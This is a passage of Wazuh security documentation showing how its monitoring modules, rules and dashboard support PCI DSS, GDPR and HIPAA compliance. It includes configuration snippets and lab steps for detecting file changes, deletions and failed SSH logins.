PCI DSS 2.2.4 requires keeping only necessary services, protocols, daemons, and functions enabled and removing or disabling all unnecessary functionality. Using the Wazuh Syscollector module, you can see what processes are running on a specific endpoint and determine if the running process or protocol is necessary for the operation of the asset. You can find this information in the IT Hygiene section on the Wazuh dashboard.

The Wazuh Syscollector module is enabled with all available scans by default in all compatible systems.
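
For reference, a typical Syscollector configuration block in the agent configuration file /var/ossec/etc/ossec.conf looks similar to the sketch below. The exact options and default values can vary between Wazuh versions, so treat it as illustrative rather than authoritative:

    <wodle name="syscollector">
      <disabled>no</disabled>
      <interval>1h</interval>
      <scan_on_start>yes</scan_on_start>
      <hardware>yes</hardware>
      <os>yes</os>
      <network>yes</network>
      <packages>yes</packages>
      <ports all="no">yes</ports>
      <processes>yes</processes>
    </wodle>
    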

Visualization and dashboard

Wazuh provides a web dashboard for data visualization and analysis. The dashboard comes with out-of-the-box modules for threat hunting, PCI DSS compliance, detected vulnerable applications, file integrity monitoring data, configuration assessment results, cloud infrastructure monitoring events, and others. You can perform forensic and historical analysis of your alerts with the Wazuh dashboard.

Wazuh also provides a PCI DSS compliance dashboard under SECURITY OPERATIONS.

Thanks to the PCI DSS compliance dashboard, it's possible to monitor and track events that trigger PCI DSS requirements. This dashboard offers a quick view of the PCI DSS controls and visualizations of related events and requirements.

The Wazuh dashboard helps meet the following PCI DSS requirement:

  • Requirement 10 - Log and Monitor All Access to System Components and Cardholder Data: This control requires that user activities, including those by employees, contractors, consultants, internal and external vendors, and other third parties are logged, monitored, and any generated alerts are reviewed periodically.

The Visualization and dashboard module helps to meet this requirement by showing events, alerts, configuration assessment results, and other information relevant to achieving PCI DSS compliance.

Use cases
  • PCI DSS 10.4 requires that audit logs are reviewed to identify anomalies or suspicious activity. Using the Wazuh dashboard component, you can review events and alerts generated by suspicious activities.

Using Wazuh for GDPR compliance

The European Union's General Data Protection Regulation (GDPR) was created to reach an agreement on data privacy legislation across Europe. Its primary focus is protecting the data of European Union citizens. The regulation aims to improve user data privacy and reform how European Union organizations approach data privacy.

Wazuh assists with GDPR compliance by performing log collection, file integrity monitoring, configuration assessment, intrusion detection, real-time alerting, and incident response.

Wazuh includes default rules and decoders for detecting various attacks, system errors, security misconfigurations, and policy violations. By default, these rules are mapped to the associated GDPR requirements. It’s possible to map your custom rules to one or more GDPR requirements by adding the compliance identifier in the <group> tag of the rule. The syntax to map a rule to a GDPR requirement is gdpr_ followed by the chapter, the article, and, if applicable, the section and paragraph to which the requirement belongs. For example, gdpr_II_5.1.f. Refer to the ruleset section for more information.

The Wazuh for GDPR white paper (PDF) guide explains how Wazuh modules assist with GDPR compliance. This document doesn’t cover the formal GDPR requirements because they are outside its technical scope.

You can find the technical requirements that Wazuh supports in the following sections:

GDPR II, Principles <gdpr_II>

This chapter describes requirements concerning the basic principles of GDPR for processing personal data.

Chapter II, Article 5 Head 1(f)

Principles relating to processing of personal data, Head 1 (f): “Personal data shall be processed in a manner that ensures appropriate security of the personal data, including protection against unauthorized or unlawful processing and against accidental loss, destruction or damage, using appropriate technical or organizational measures (integrity and confidentiality).”

The article requires confidentiality and integrity when processing user data. The File Integrity Monitoring (FIM) module of Wazuh helps with this requirement by monitoring files and folders. The Wazuh FIM module generates alerts when it detects file creation, modification, or deletion events. The FIM module keeps a record of the cryptographic checksum and other attributes of a file, or of a registry key in the case of a Windows endpoint, and regularly compares them to the current attributes of the file.

Below are some examples of Wazuh rules tagged as gdpr_II_5.1.f:

<rule id="550" level="7">
    <category>ossec</category>
    <decoded_as>syscheck_integrity_changed</decoded_as>
    <description>Integrity checksum changed.</description>
    <group>syscheck,pci_dss_11.5,gpg13_4.11,gdpr_II_5.1.f,</group>
</rule>

<rule id="554" level="5">
    <category>ossec</category>
    <decoded_as>syscheck_new_entry</decoded_as>
    <description>File added to the system.</description>
    <group>syscheck,pci_dss_11.5,gpg13_4.11,gdpr_II_5.1.f,</group>
</rule>
Use case: Detect file changes

In this use case, you have to configure the Wazuh agent on an Ubuntu 22.04 endpoint to detect changes in the /root/personal_data directory. Then, you need to modify a file to trigger an alert.

Ubuntu endpoint
  1. Switch to the root user:

    $ sudo su
    
  2. Create the directory personal_data in the /root directory:

    # mkdir /root/personal_data
    
  3. Create the file subject_data.txt in the /root/personal_data directory and include some content:

    # touch /root/personal_data/subject_data.txt
    # echo "User01= user03_ID" >> /root/personal_data/subject_data.txt
    
  4. Add the following configuration to the <syscheck> block of the Wazuh agent configuration file /var/ossec/etc/ossec.conf:

    <syscheck>
      <directories realtime="yes" check_all="yes" report_changes="yes">/root/personal_data</directories>
    </syscheck>
    
  5. Restart the Wazuh agent to apply the changes:

    # systemctl restart wazuh-agent
    
  6. Modify the file by changing the content of subject_data.txt from User01= user03_ID to User01= user02_ID:

    # echo "User01= user02_ID" > /root/personal_data/subject_data.txt
    # cat /root/personal_data/subject_data.txt
    
    User01= user02_ID
    

On the Wazuh dashboard, an alert detects the modification of the subject_data.txt file. The alert is also tagged with gdpr_II_5.1.f.

GDPR III, Rights of the data subject <gdpr_III>

In this chapter, GDPR describes the rights of individuals regarding personal data management by third-party entities.

Chapter III, Article 14, Head 2 (c)

Information to be provided where personal data have not been obtained from the data subject, Head 2 (c): “In addition to the information referred to in paragraph 1, the controller shall provide the data subject with the following information necessary to ensure fair and transparent processing in respect of the data subject: the existence of the right to request from the controller access to and rectification or erasure of personal data or restriction of processing concerning the data subject and to object to processing as well as the right to data portability.”

This article requires that when an individual requests a temporary restriction on the processing of their data, there is no access to that data during the specified period.

Using File Integrity Monitoring (FIM) and the Wazuh dashboard, you can perform searches to confirm that there has been no modification or deletion of user data during the specified period of restriction.

Use case: Search for FIM events within a certain time frame

In this use case, you filter for syscheck events from the Wazuh dashboard to confirm that there have been no FIM events involving modification or deletion of restricted data during specific time intervals.
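
For example, in the Discover section of the Wazuh dashboard, you can set the time range to the restriction period and use a query similar to the one below. The field names assume the default Wazuh alert schema (rule.groups and syscheck.event); adjust them if your index mappings differ:

    rule.groups:syscheck AND (syscheck.event:modified OR syscheck.event:deleted)
    

If the search returns no results for the selected period, no modification or deletion of the monitored data was recorded during that time.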

Chapter III, Article 17, Head 1

Right to erasure (right to be forgotten): “The data subject shall have the right to obtain from the controller the erasure of personal data concerning him or her without undue delay and the controller shall have the obligation to erase personal data without undue delay.”

The Wazuh File Integrity Monitoring module assists in meeting this GDPR requirement. It monitors specified files and folders containing personal data and generates alerts when modification or deletion occurs. File deletion alerts can provide individuals with confirmation that their personal data has been permanently deleted in response to their request.

Use case: Detect file deletion

In this use case, you have to configure the Wazuh agent on an Ubuntu 22.04 endpoint to detect file deletion in the /root/personal_data directory. Then, you need to delete a file to trigger an alert.

Ubuntu endpoint
  1. Switch to the root user:

    $ sudo su
    
  2. Create the directory personal_data in the /root directory:

    # mkdir /root/personal_data
    
  3. Create the file subject_data.txt in the /root/personal_data directory and include some content:

    # touch /root/personal_data/subject_data.txt
    # echo "User01= user03_ID" >> /root/personal_data/subject_data.txt
    
  4. Add the following configuration to the <syscheck> block of the Wazuh agent configuration file /var/ossec/etc/ossec.conf:

    <syscheck>
      <directories check_all="yes" realtime="yes">/root/personal_data</directories>
    </syscheck>
    
  5. Restart the Wazuh agent to apply the changes:

    # systemctl restart wazuh-agent
    
  6. Delete the file subject_data.txt:

    # rm /root/personal_data/subject_data.txt
    

On the Wazuh dashboard, an alert shows that the subject_data.txt file has been deleted.

GDPR IV, Controller and processor <gdpr_IV>

In this chapter, GDPR describes requirements related to managing, controlling, and processing personal data.

Chapter IV, Article 24, Head 2

Responsibility of the controller, Head 2: “Where proportionate in relation to processing activities, the measures referred to in paragraph 1 shall include the implementation of appropriate data protection policies by the controller.”

This article requires that adequate technical and organizational measures assist in complying with data security and protection policies. Therefore, the entity in charge of processing and storing data must comply with these policies.

Using the Security Configuration Assessment (SCA) module, Wazuh performs configuration assessments to ensure that endpoints comply with security policies, standards, and hardening guides. Refer to the SCA documentation section for more details on configuring SCA checks.

Use case: Ensure that the shadow group is empty

In this use case, Wazuh runs SCA checks to find out if the shadow user group on an Ubuntu 22.04 endpoint is empty. The /etc/shadow file in Linux systems stores encrypted user passwords. Any user in the shadow group can read the contents of the /etc/shadow file. Unauthorized access to this file can lead to system compromise by malicious actors. The SCA check ID is 28690. When the SCA check runs, if there are no users assigned to the shadow group, the SCA check passes.
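
To verify the same condition manually on the endpoint, you can list the members of the shadow group. This is a quick sanity check and not part of the SCA configuration:

    # getent group shadow
    

If nothing appears after the last colon of the output, the group has no members and the SCA check should pass.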

The image below shows the result of the SCA check on the Wazuh dashboard.

Chapter IV, Article 28, Head 3 (c)

Processor, Head 3 (c): “Processing by a processor shall be governed by a contract or other legal act under Union or Member State law, that is binding on the processor with regard to the controller and that sets out the subject-matter and duration of the processing, the nature and purpose of the processing, the type of personal data and categories of data subjects and the obligations and rights of the controller. That contract or other legal act shall stipulate, in particular, that the processor: takes all measures required pursuant to Article 32.”

According to this article, organizational and technical safeguards must be in place to protect data during processing. This is necessary to avoid any unauthorized alterations.

Using the File Integrity Monitoring (FIM) module, Wazuh ensures that certain established protection measures are met. Wazuh uses the FIM module to help enhance security in the processing of data. It logs information about who modified the data, when the modification occurred, and all related events impacting the data of interest.

Use case: Detect changes to file attributes

In this use case, you have to configure the Wazuh agent to detect changes to /root/personal_data or its attributes, as well as detect who made the changes. The configuration in this use case is specific to an Ubuntu 22.04 endpoint. Then, you need to change the owner of a file to trigger an alert.

Ubuntu endpoint
  1. Switch to the root user:

    $ sudo su
    
  2. Create the directory personal_data in the /root directory:

    # mkdir /root/personal_data
    
  3. Create the file subject_data.txt in the /root/personal_data directory and include some content:

    # touch /root/personal_data/subject_data.txt
    # echo "User01= user03_ID" >> /root/personal_data/subject_data.txt
    
  4. Install auditd to get information about who made changes in a monitored directory using the Linux Auditing System:

    # apt-get install auditd
    
  5. Add the following configuration to the <syscheck> block of the Wazuh agent configuration file /var/ossec/etc/ossec.conf:

    <syscheck>
      <directories check_all="yes" whodata="yes">/root/personal_data</directories>
    </syscheck>
    
  6. Restart the Wazuh agent to apply the changes:

    # systemctl restart wazuh-agent
    
  7. Change the owner of subject_data.txt from root to a regular user:

    # chown <YOUR_REGULAR_USER>:<YOUR_REGULAR_USER> /root/personal_data/subject_data.txt
    

The FIM module generates the alert below showing the changed attributes.

Chapter IV, Article 30, Head 1 (g)

Records of processing activities. Head 1 (g): “Each controller and, where applicable, the controller's representative, shall maintain a record of processing activities under its responsibility. That record shall contain all of the following information: where possible, a general description of the technical and organizational security measures referred to in Article 32 (1).”

This article requires that organizations document, inventory, and audit data processing activities. This helps keep a record of all data processing activities.

Wazuh supports the storage of information about file integrity monitoring and system events. It uses the log data collection capability to store all the events the Wazuh server receives in the archives file /var/ossec/logs/archives/archives.log. Additionally, the /var/ossec/logs/archives/alerts.log file stores alerts from rules triggered. These logs help in performing various activities, such as data audits and threat hunting.

Use case: Store all logs generated from an endpoint

In this use case, you have to set storage of all events from monitored endpoints in the Wazuh archives, whether they generate an alert or not.

Wazuh server
  1. Edit the Wazuh server configuration file /var/ossec/etc/ossec.conf and set the <logall> option to yes, as shown in the configuration block below:

    <global>
      <jsonout_output>yes</jsonout_output>
      <alerts_log>yes</alerts_log>
      <logall>yes</logall>
      <logall_json>no</logall_json>
      <email_notification>no</email_notification>
      <smtp_server>smtp.example.wazuh.com</smtp_server>
      <email_from>wazuh@example.wazuh.com</email_from>
      <email_to>recipient@example.wazuh.com</email_to>
      <email_maxperhour>12</email_maxperhour>
      <email_log_source>alerts.log</email_log_source>
      <agents_disconnection_time>15m</agents_disconnection_time>
      <agents_disconnection_alert_time>0</agents_disconnection_alert_time>
    </global>
    
  2. Restart the Wazuh manager to apply the configuration:

    # systemctl restart wazuh-manager
    
  3. Check the contents of the /var/ossec/logs/archives/archives.log file on the Wazuh manager. You can see events, including those that do not trigger an alert:

    # tail -f /var/ossec/logs/archives/archives.log
    
    2022 Sep 30 09:57:25 wazuh-manager->/var/log/syslog Sep 30 09:57:25 wazuh-manager multipathd[504]: sda: failed to get sgio uid: No data available
    2022 Sep 30 09:57:25 wazuh-manager->/var/log/syslog Sep 30 09:57:25 wazuh-manager multipathd[504]: sda: failed to get sysfs uid: No data available
    2022 Sep 30 09:57:30 (Ubuntu) any->/var/log/auth.log Sep 30 09:57:30 Ubuntu su: pam_unix(su:session): session closed for user root
    2022 Sep 30 09:57:30 (Ubuntu) any->/var/log/auth.log Sep 30 09:57:30 Ubuntu sudo: pam_unix(sudo:session): session closed for user root
    2022 Sep 30 09:57:31 wazuh-manager->/var/log/syslog Sep 30 09:57:30 wazuh-manager multipathd[504]: sda: add missing path
    2022 Sep 30 09:57:31 wazuh-manager->/var/log/syslog Sep 30 09:57:30 wazuh-manager multipathd[504]: sda: failed to get sysfs uid: No data available
    2022 Sep 30 09:57:31 wazuh-manager->/var/log/syslog Sep 30 09:57:30 wazuh-manager multipathd[504]: sda: failed to get udev uid: Invalid argument
    2022 Sep 30 09:57:31 wazuh-manager->/var/log/syslog Sep 30 09:57:30 wazuh-manager multipathd[504]: sda: failed to get sgio uid: No data available
    2022 Sep 30 09:57:31 wazuh-manager->/var/log/syslog Sep 30 09:57:31 wazuh-manager multipathd[504]: sdb: add missing path
    2022 Sep 30 09:57:31 wazuh-manager->/var/log/syslog Sep 30 09:57:31 wazuh-manager multipathd[504]: sdb: failed to get udev uid: Invalid argument
    
Chapter IV, Article 32, Head 2

Security of processing, Head 2: “In assessing the appropriate level of security, account shall be taken in particular of the risks that are presented by processing, in particular from accidental or unlawful destruction, loss, alteration, unauthorised disclosure of, or access to personal data transmitted, stored or otherwise processed.”

This article requires carrying out risk assessments to find out what risks processing actions pose to personal user data. The Wazuh log data analysis module and default ruleset help meet aspects of this article by monitoring actions taken by data administrators. With this, the data protection officer is able to check who is accessing and processing the data, whether they are authorized to do so, and whether they are who they say they are.

Use case: Invalid SSH login attempts

In this use case, there is an example of a Wazuh rule to detect SSH authentication attempts with an invalid user. The Wazuh server receives SSH authentication logs from the monitored endpoint. The log data analysis module then decodes and evaluates these logs against default Wazuh rules to determine if they match a behavior of interest.

  • Rule 5710 - sshd: Attempt to login using a non-existent user.

    <rule id="5710" level="5">
      <if_sid>5700</if_sid>
      <match>illegal user|invalid user</match>
      <description>sshd: Attempt to login using a non-existent user</description>
      <group>invalid_login,authentication_failed,pci_dss_10.2.4,pci_dss_10.2.5,pci_dss_10.6.1,gpg13_7.1,gdpr_IV_35.7.d,gdpr_IV_32.2,</group>
    </rule>
    

When an invalid login attempt triggers rule 5710, you can see the alert below on the Wazuh dashboard.

Chapter IV, Article 33, Head 1

Notification of a personal data breach to the supervisory authority, Head 1: “In the case of a personal data breach, the controller shall without undue delay and, where feasible, not later than 72 hours after having become aware of it, notify the personal data breach to the supervisory authority competent in accordance with Article 55, unless the personal data breach is unlikely to result in a risk to the rights and freedoms of natural persons. Where the notification to the supervisory authority is not made within 72 hours, it shall be accompanied by reasons for the delay.”

This article requires that organizations report data breaches to the appropriate authorities within a stipulated time frame. Wazuh facilitates this communication by sending email notifications when events trigger a specific alert or a group of alerts related to events about personal data. Refer to the Wazuh email alerts section of the documentation for more information on configuring email notifications.

Use case: Email alert on failed login

In this use case, you configure Wazuh to generate an alert and send notifications to the specified email addresses whenever a user login attempt via SSH fails.

  1. Edit the email section of the Wazuh manager configuration file /var/ossec/etc/ossec.conf as follows to implement email notifications:

    <ossec_config>
      <global>
        <email_notification>yes</email_notification>
        <email_to>data_protection_officer@test.example</email_to>
        <smtp_server>mail.test.example</smtp_server>
        <email_from>wazuh@test.example</email_from>
      </global>
    </ossec_config>
    
  2. Restart the Wazuh manager to apply the configuration changes:

    # systemctl restart wazuh-manager
    

The changes made enable sending alerts via email to data_protection_officer@test.example.

The sample email sent after an alert is generated looks like the following:

From: Wazuh <wazuh@test.example>               5:03 PM (2 minutes ago)
to: me
-----------------------------
Wazuh Notification.
2022 Jun 20 17:03:05

Received From: Ubuntu->/var/log/secure
Rule: 5503 fired (level 5) -> "PAM: User login failed."
Src IP: 192.168.1.37
Portion of the log(s):

Jun  20 22:03:04 Ubuntu sshd[67231]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=192.168.1.37
uid: 0
euid: 0
tty: ssh

 --END OF NOTIFICATION
Chapter IV, Article 35, Head 1

Data protection impact assessment, Head 1: “Where a type of processing in particular using new technologies, and taking into account the nature, scope, context and purposes of the processing, is likely to result in a high risk to the rights and freedoms of natural persons, the controller shall, prior to the processing, carry out an assessment of the impact of the envisaged processing operations on the protection of personal data. A single assessment may address a set of similar processing operations that present similar high risks.”

This article recommends performing a risk assessment on data processing channels and the impact of the risks identified on data protection. Wazuh can support the risk assessment outcome by categorizing FIM alerts for certain files or directories and increasing the alert levels based on the risk assessment reports.

Use case: Increase the alert level of a file modification event

In this use case, you have to set a high alert level for a file modification event if the file is in a specific directory. In the example below, you can find a rule with alert level 15 for data changes in the /customers/personal_data directory. Then, you need to modify files to trigger alerts.

Ubuntu endpoint
  1. Create the directory /customers:

    # mkdir /customers
    
  2. Create the directory personal_data in the /customers directory:

    # mkdir /customers/personal_data
    
  3. Add the following configuration to the <syscheck> block of the agent configuration file /var/ossec/etc/ossec.conf:

    <syscheck>
      <directories realtime="yes" check_all="yes" report_changes="yes">/customers/</directories>
    </syscheck>
    
  4. Restart the Wazuh agent to apply the changes:

    # systemctl restart wazuh-agent
    
Wazuh server
  1. Add the following rules in the /var/ossec/etc/rules/local_rules.xml file:

    <rule id="100002" level="15">
        <if_matched_group>syscheck</if_matched_group>
        <match>/customers/personal_data</match>
        <description>Changes made to a sensitive file - $(file).</description>
    </rule>
    
  2. Restart the Wazuh manager for the configuration changes to apply:

    # systemctl restart wazuh-manager
    
Ubuntu endpoint
  1. Create the file regular_data.txt in the /customers directory and add some content:

    # touch /customers/regular_data.txt
    # echo "this is regular data" >> /customers/regular_data.txt
    

    You can see a level 7 alert generated in the File Integrity Monitoring section of the Wazuh dashboard to show that a file in the monitored directory was modified.

  2. Create the file sensitive_data.txt in the /customers/personal_data directory and add some content:

    # touch /customers/personal_data/sensitive_data.txt
    # echo "User01= user03_ID" >> /customers/personal_data/sensitive_data.txt
    

    You can see a level 15 alert generated to show that a sensitive file in the monitored directory was modified.

Chapter IV, Article 35, Head 7 (d)

Data protection impact assessment, Head 7 (d): "The assessment shall contain at least the measures envisaged to address the risks, including safeguards, security measures and mechanisms to ensure the protection of personal data and to demonstrate compliance with this Regulation taking into account the rights and legitimate interests of data subjects and other persons concerned."

This article recommends that you implement necessary security measures to protect subject data. These security measures include threat detection and response on endpoints that contain personal user data.

Wazuh helps meet this article of the GDPR by providing security measures such as threat detection and response, file integrity monitoring, and vulnerability detection on endpoints that contain personal user data.

Using Wazuh for HIPAA compliance

The Health Insurance Portability and Accountability Act (HIPAA) has specifications and procedures for handling health information. This act aims to improve the effectiveness of healthcare services. It includes standards for electronic health care transactions and code sets. It also includes standards for security and unique health identifiers. Because changes in technology can impact the privacy and security of healthcare data, HIPAA provisions have sections that require the use of federal privacy protections for individually identifiable health information.

Part 164, subpart C (Security Standards For The Protection Of Electronic Protected Health Information), provides guidelines for the transmission, handling, storage, and protection of electronic healthcare information.

Wazuh has various capabilities that assist with HIPAA compliance such as log data analysis, file integrity monitoring, configuration assessment, threat detection and response.

Wazuh includes default rules and decoders for detecting security incidents, system errors, security misconfigurations, and policy violations. By default, these rules are mapped to the associated HIPAA standard. In addition to the default rule mapping provided by Wazuh, it’s possible to map your custom rules to one or more HIPAA standards by adding the compliance identifier in the <group> tag of the rule. The syntax used to map a rule to a HIPAA standard is hipaa_ followed by the number of the requirement, for example, hipaa_164.312.b. Refer to the ruleset section for more information.
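
As a hypothetical illustration of this syntax, the custom rule below maps an alert to HIPAA section 164.312.b. The rule ID 100010 is an arbitrary example and not part of the default ruleset; it simply extends rule 5710, which is shown elsewhere in this documentation:

    <rule id="100010" level="5">
      <if_sid>5710</if_sid>
      <description>Custom rule mapped to a HIPAA standard.</description>
      <group>authentication_failed,hipaa_164.312.b,</group>
    </rule>
    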

The Wazuh for HIPAA guide (PDF) focuses on part 164, subpart C (Security Standards For The Protection Of Electronic Protected Health Information) of the HIPAA standard. This guide explains how the various Wazuh modules assist in complying with HIPAA standards.

We have use cases in the following sections that show how to use Wazuh capabilities and modules to comply with HIPAA standards:

Visualization and dashboard

Wazuh offers a web dashboard for data visualization and analysis. The Wazuh dashboard comes with out-of-the-box modules for threat hunting, compliance, detected vulnerable applications, file integrity monitoring data, configuration assessment results, and cloud infrastructure monitoring. It’s useful for performing forensic and historical alert analysis.

The Wazuh dashboard assists in meeting the following HIPAA section:

  • Security Management Process §164.308(a)(1) - Information System Activity Review: “Implement procedures to regularly review records of information system activity, such as audit logs, access reports, and security incident tracking reports.”

This section of the HIPAA standard requires regularly reviewing the activities performed on endpoints that handle health data in order to detect malicious behavior or security violations.

Use case: Review HIPAA security alerts

Wazuh generates alerts when there are violations of the HIPAA sections. The Wazuh dashboard is used to review events and alerts generated by suspicious activities.

The Wazuh dashboard comes with a dedicated module to track HIPAA related events.

When you choose the HIPAA module, you can see all alerts related to the HIPAA standard.

Additionally, the Controls section of the HIPAA compliance dashboard shows the various HIPAA related events. For ease of navigation, the Wazuh dashboard groups events according to the HIPAA section they meet or violate.

On the Wazuh dashboard, each HIPAA section has an information area. This area details the goals of the section, its description, and related events on the monitored endpoints.

Log data analysis

The logs generated from devices, systems, and applications are useful for detecting security incidents and system errors. The Wazuh log data analysis module collects and analyzes logs from various sources such as applications, endpoints, network devices, cloud workloads, and other security solutions. The data collected and analyzed by the log data analysis module helps in threat detection, prevention, and active response. Refer to the ruleset section for more information.

The Wazuh log data analysis module can help comply with the following HIPAA sections:

  • Audit Controls §164.312(b): “A covered entity or business associate must, in accordance with § 164.306 implement hardware, software, and/or procedural mechanisms that record and examine activity in information systems that contain or use electronic protected health information.”

    This section of the HIPAA standard requires that tools be in place to log activities on all systems containing health data. The activities logged may include: authentication, system or application failure, and file read, write, or modification events.

  • Security Incident Procedures §164.308(a)(6)(i) - Response and reporting: “Identify and respond to suspected or known security incidents; mitigate, to the extent practicable, harmful effects of security incidents that are known to the covered entity or business associate; and document security incidents and their outcomes.”

    This section of the HIPAA standard requires you to identify and mitigate security incidents and threats. The log data analysis module helps identify these incidents by analysis of endpoint activities.

  • Person or Entity Authentication §164.312(d): “A covered entity or business associate must, in accordance with § 164.306 implement procedures to verify that a person or entity seeking access to electronic protected health information is the one claimed.”

    This section of the HIPAA standard requires you to log and review user authentication activities. The analysis of these activities helps determine if they are legitimate. The Wazuh log data analysis module analyzes logs to generate alerts when suspicious activities are detected.

Use case: SSH authentication

In this use case, the Wazuh server receives SSH authentication logs from an Ubuntu 22.04 endpoint. The log data analysis module then decodes and evaluates these logs against Wazuh rules to determine if they match a behavior of interest, for example, successful authentication.

Below is a rule to detect and alert on a successful SSH authentication:

  • Rule 5715 - sshd: authentication success: When a user successfully logs into an endpoint via SSH, this rule generates an alert. The alert includes the username, timestamp, and authentication status (success or failure). The image below shows the alerts generated on the Wazuh dashboard for successful SSH authentications:

Configuration assessment

The Security Configuration Assessment (SCA) module performs scans to determine if monitored endpoints meet secure configuration and hardening policies. These scans assess the configuration of the endpoint using policy files that contain rules to be tested against the actual configuration of the endpoint.

The SCA module can help to implement the following HIPAA sections:

  • Evaluation §164.308(a)(8): “A covered entity or business associate must perform a periodic technical and nontechnical evaluation, based initially on the standards implemented under this rule and, subsequently, in response to environmental or operational changes affecting the security of electronic protected health information, that establishes the extent to which a covered entity's or business associate's security policies and procedures meet the requirements of this subpart.”

    This section of the HIPAA standard requires you to conduct regular reviews of systems containing health information to ensure that they comply with security policies.

  • Access Control §164.312(a)(1) - Automatic Logoff: “Implement electronic procedures that terminate an electronic session after a predetermined time of inactivity.”

    This section of the HIPAA standard requires you to implement measures that will terminate login sessions in systems that contain healthcare information after a specified period of inactivity. This includes making sure that an RDP or SSH session is automatically terminated after a predetermined duration of inactivity.

    The Wazuh SCA module scans endpoints on a regular basis to ensure they comply with specified security policies. These scans also find missing access control policies like automatic logoff configurations. Refer to the Wazuh SCA documentation for more details on configuring SCA checks.

Use cases: SCA scan and SSH session timeout
  • In this use case, the SCA module performs periodic scans on an Ubuntu 22.04 endpoint to ensure that it complies with security policies and hardening configurations. Additionally, the Configuration Assessment module on the Wazuh dashboard displays the status of the SCA checks (passed, failed, or not applicable) and the time of the last scan for a specific endpoint, as shown below:

    The Wazuh SCA policy CIS benchmark for Ubuntu Linux 22.04 LTS is an out-of-the-box policy based on the Center for Internet Security (CIS) benchmarks, a well-established standard for host hardening.

  • In this use case, Wazuh runs SCA checks to determine the status of the SSH session timeout on an Ubuntu 22.04 endpoint. The ID of the check is 28653. When this SCA check runs, if the SSH session timeout on the endpoint is not configured, its result is Failed. Additionally, each SCA check contains the reason why the check is performed, a description of the check, and a remediation if the SCA check fails (an example remediation is sketched after this list).
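
    As an illustration of the kind of remediation such a check points to, an SSH idle session timeout is typically configured in /etc/ssh/sshd_config. The values shown below are examples only and are not taken from the SCA check itself; they represent a compliant configuration you could verify like this:

    # grep -E "^ClientAliveInterval|^ClientAliveCountMax" /etc/ssh/sshd_config
    ClientAliveInterval 300
    ClientAliveCountMax 3
    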

Malware detection

Wazuh offers several capabilities that support malware detection. These detections rely on methods such as out-of-the-box threat detection rules, the rootcheck component, CDB lists, and integrations with VirusTotal and YARA.

These components of Wazuh help to comply with the following HIPAA section:

  • Security Awareness and Training §164.308(a)(5)(i) - Protection from Malicious Software: “Procedures for guarding against, detecting, and reporting malicious software.”

    This section of the HIPAA standard requires you to have procedures to detect and remove malicious software. The Wazuh malware detection capability implements this HIPAA section with the aid of out-of-the-box rules, VirusTotal and YARA integration, and the use of CDB lists. The rootcheck component of Wazuh also detects abnormal behavior in monitored endpoints. These capabilities help support this HIPAA section.

    We show a use case of how to detect a rootkit.

File integrity monitoring

The Wazuh File Integrity Monitoring (FIM) module monitors an endpoint filesystem to detect changes in specified files and directories. It triggers alerts on file creation, modification, or deletion from the monitored paths. The FIM module stores the cryptographic checksum and other attributes of the monitored file, folder, or Windows registry key, and alerts when there is a change.

The File Integrity Monitoring module assists you in meeting the following HIPAA sections:

  • Workforce Security §164.308(a)(3)(i) - Authorization and/or supervision: “Implement procedures for the authorization and/or supervision of workforce members who work with electronic protected health information or in locations where it might be accessed.”

  • Integrity §164.312(c)(1) - Mechanism to authenticate electronic protected health information: “Implement electronic mechanisms to corroborate that electronic protected health information has not been altered or destroyed in an unauthorized manner.”

  • Transmission Security §164.312(e)(1) - Integrity controls: “Implement security measures to ensure that electronically transmitted electronic protected health information is not improperly modified without detection until disposed of.”

These sections of the HIPAA standard require monitoring files and directories containing healthcare data. The Wazuh FIM module assists in meeting these HIPAA sections. It monitors files containing healthcare information and generates alerts when there is a modification or deletion. Refer to the Wazuh FIM documentation for more details on configuring file integrity monitoring.

Use cases: Detect file changes and deletion

The use cases in this section are performed on an Ubuntu 22.04 endpoint.

Detect file changes

In this use case, the Wazuh agent detects changes made to the patient_data.txt file in the /root/health_data directory.

On the Ubuntu endpoint

  1. Create the health_data directory in the /root directory:

    # mkdir /root/health_data
    
  2. Create the file patient_data.txt in the /root/health_data directory and include some content:

    # touch /root/health_data/patient_data.txt
    # echo "User1 = medication" >> /root/health_data/patient_data.txt
    
  3. Add the following configuration to the syscheck block of the agent configuration file /var/ossec/etc/ossec.conf to monitor the /root/health_data directory for changes:

    <syscheck>
       <directories check_all="yes" realtime="yes">/root/health_data</directories>
    </syscheck>
    
  4. Restart the Wazuh agent to apply the changes:

    # systemctl restart wazuh-agent
    
  5. Modify the file by adding new content:

    # echo "User2 = medication3" >> /root/health_data/patient_data.txt
    

    You can see an alert generated to show that a file in the monitored directory was modified.

    The alert details include the differences in the file checksum, the file modified, the modification time, and other information.

Detect file deletion

In this use case, you configure the Wazuh agent to detect file deletion in a monitored directory. Using the steps below, configure the FIM module to monitor the /root/health_data/ directory for changes.

On the Ubuntu endpoint

  1. Create the health_data directory in the /root directory if it is not present:

    # mkdir /root/health_data
    
  2. Create the file patient_data.txt in the /root/health_data directory and include some content:

    # touch /root/health_data/patient_data.txt
    # echo "User1 = medication" > /root/health_data/patient_data.txt
    
  3. Add the following configuration to the syscheck block of the agent configuration file /var/ossec/etc/ossec.conf to monitor the /root/health_data directory for changes:

    <syscheck>
       <directories check_all="yes" realtime="yes">/root/health_data</directories>
    </syscheck>
    
  4. Restart the Wazuh agent to apply the changes:

    # systemctl restart wazuh-agent
    
  5. Delete a file from the monitored directory. In this case, delete patient_data.txt:
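
    # rm /root/health_data/patient_data.txt
    

    You can see an alert generated for the deleted file.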

    The alert details include the file deleted, the endpoint where the file was deleted, the deletion time, and other details.

Vulnerability detection

Wazuh detects vulnerabilities in the applications installed on monitored endpoints using the Vulnerability Detection module. It performs a software audit by querying our Cyber Threat Intelligence (CTI) API for vulnerability content documents. We aggregate vulnerability information into the CTI repository from external vulnerability sources indexed by Canonical, Debian, Red Hat, Arch Linux, Amazon Linux Advisories Security (ALAS), Microsoft, CISA, and the National Vulnerability Database (NVD). We also maintain the integrity of our vulnerability data and keep the vulnerabilities repository updated, ensuring the solution checks for the latest CVEs. The Vulnerability Detection module correlates this information with data from the endpoint application inventory.

The Vulnerability Detection module helps to implement the following HIPAA section:

  • Security Management Process §164.308(a)(1) - Risk Analysis: “Conduct an accurate and thorough assessment of the potential risks and vulnerabilities to the confidentiality, integrity, and availability of electronic protected health information held by the covered entity or business associate.”

    This section of the HIPAA standard requires identifying risks and vulnerabilities affecting systems containing healthcare information.

